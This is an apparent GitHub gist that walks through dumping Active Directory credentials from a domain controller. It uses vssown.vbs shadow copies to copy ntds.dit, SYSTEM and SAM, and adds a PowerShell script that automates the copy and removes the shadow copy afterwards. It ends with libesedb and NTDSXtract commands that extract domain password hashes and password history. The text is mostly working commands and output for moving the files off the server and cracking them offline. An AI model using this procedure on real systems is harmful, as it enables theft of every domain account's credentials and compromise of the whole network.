@jstnkndy
Last active August 29, 2015 14:06
# Start the Volume Shadow Service
C:\bak>cscript vssown.vbs /start
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
[*] Signal sent to start the VSS service.
# Create a Volume Shadow Copy of the drive the files reside on. Here that is C:, but the NTDS database is not always on C: (see the note below the copy commands)
C:\bak>cscript vssown.vbs /create C
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
[*] Attempting to create a shadow copy.
# List the Shadow Copy output
C:\bak>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
SHADOW COPIES
=============
[*] ID: {XXX}
[*] Client accessible: True
[*] Count: 1
[*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4
[*] Differential: True
[*] Exposed locally: False
[*] Exposed name:
[*] Exposed remotely: False
[*] Hardware assisted: False
[*] Imported: False
[*] No auto release: True
[*] Not surfaced: False
[*] No writers: True
[*] Originating machine: DS-DC03.ds.xxx.yyy
[*] Persistent: True
[*] Plex: False
[*] Provider ID: {XXX}
[*] Service machine: DS-DC03.ds.xxx.yyy
[*] Set ID: {XXX}
[*] State: 12
[*] Transportable: False
[*] Volume name: \\?\Volume{XXX}\
# Copy ntds.dit and the SYSTEM hive (and SAM, if you also want the DC's local accounts) to your working directory from the shadow copy device object listed above (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4)
# ntds.dit holds the domain hashes and SYSTEM holds the boot key needed to decrypt them; SAM only covers the DC's local accounts, not the domain
C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SYSTEM .
1 file(s) copied.
C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SAM .
1 file(s) copied.
C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\ntds\ntds.dit .
1 file(s) copied.
# The default location is \windows\ntds\ntds.dit, i.e. C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\ntds\ntds.dit .
# The database can also live on another drive such as E:\ (the authoritative path is the "DSA Database file" value under HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters), so check that first. If it does, create a shadow copy of that drive the same way as for C above and copy ntds.dit from it; SYSTEM still comes from the system drive
# At this point you will need to copy the ntds.dit, SYSTEM, and SAM to your box by whatever means you would like
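The same shadow-copy-and-copy procedure done from an elevated PowerShell prompt on the DC, as an added example that is not part of the original gist and is not vssown.vbs. It drives the Win32_ShadowCopy WMI class directly, reads the real ntds.dit location from the "DSA Database file" registry value so it also handles the case where NTDS lives on a volume other than C:, and removes each shadow copy when it is done. Assumptions: it runs as an administrator on the DC, and the output directory `$Destination` (defaulting to C:\bak here) is a name chosen for this example.

```powershell
# Added example, not the gist's own code: create a shadow copy per volume with Win32_ShadowCopy,
# copy ntds.dit and the SYSTEM hive out of it, then delete the shadow copy again.
param(
    [string]$Destination = "C:\bak"   # assumed output directory, change as needed
)

$ErrorActionPreference = "Stop"
New-Item -ItemType Directory -Path $Destination -Force | Out-Null

# Authoritative location of the AD database; this value is written at DC promotion time.
$ntdsParams = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters"
$ntdsPath   = (Get-ItemProperty -Path $ntdsParams -Name "DSA Database file")."DSA Database file"
# The SYSTEM hive carries the boot key needed to decrypt the hashes stored in ntds.dit.
$systemHive = Join-Path $env:SystemRoot "System32\config\SYSTEM"

# VSS is normally set to Manual start on a DC, so make sure it is running first.
Start-Service -Name VSS

function Copy-FromShadow {
    param([string[]]$Files, [string]$OutDir)

    # Group the files by volume so a database on a different drive (e.g. E:\) gets its own shadow copy.
    $byVolume = $Files | Group-Object { [System.IO.Path]::GetPathRoot($_) }
    foreach ($group in $byVolume) {
        $volume   = $group.Name                          # e.g. "C:\"
        $vssClass = [wmiclass]"root\cimv2:Win32_ShadowCopy"
        $result   = $vssClass.Create($volume, "ClientAccessible")
        if ($result.ReturnValue -ne 0) {
            throw "Win32_ShadowCopy.Create failed for $volume with return value $($result.ReturnValue)"
        }
        $shadow = Get-WmiObject -Class Win32_ShadowCopy | Where-Object { $_.ID -eq $result.ShadowID }
        Write-Host "[*] Shadow copy $($shadow.ID) of $volume at $($shadow.DeviceObject)"

        try {
            foreach ($file in $group.Group) {
                # Rebase "C:\Windows\NTDS\ntds.dit" onto
                # "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\NTDS\ntds.dit".
                $relative = $file.Substring($volume.Length)
                $source   = "$($shadow.DeviceObject)\$relative"
                $target   = Join-Path $OutDir (Split-Path $file -Leaf)
                # cmd's copy accepts the \\?\GLOBALROOT device path; Copy-Item does not handle it reliably.
                cmd.exe /c copy /y "$source" "$target" | Out-Null
                if (-not (Test-Path $target)) { throw "Copy of $source failed" }
                Write-Host "[*] Copied $file -> $target"
            }
        }
        finally {
            # Remove the shadow copy so the DC is left as it was found.
            $shadow | Remove-WmiObject
        }
    }
}

Copy-FromShadow -Files @($ntdsPath, $systemHive) -OutDir $Destination
```

Run it once from an elevated prompt on the DC; the two files land in `$Destination` under their original names (ntds.dit and SYSTEM), ready to be moved off the box for offline extraction. The copy is done through cmd.exe because the `\\?\GLOBALROOT\Device\...` device path is what the shadow copy is exposed as, and that is the same path form the gist's manual copy commands use.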
# You will need to download the following tools to extract the data out of the files we've copied
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
wget https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz # thank mubix for this link!
tar zxvf libesedb-alpha-20120102.tar.gz
unzip ntdsxtract_v1_0.zip
root@host:~/# cd libesedb-20120102
root@host:~/libesedb-20120102# ./configure
root@host:~/libesedb-20120102# make
root@host:~/libesedb-20120102# cd esedbtools/
root@host:~/libesedb-20120102/esedbtools# ./esedbexport ntds.dit
# esedbexport writes the exported tables into a directory named after the input (ntds.dit.export/ by default); the two files you need from it are the datatable and link_table exports
cd "NTDSXtract 1.0/"
# <datatable> and <link table> are those two exported files; the SYSTEM hive is the one copied out of the shadow copy above (saved as SYSTEM there, referred to as SYSTEM.hive here)
python dsusers.py <datatable> <link table> --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive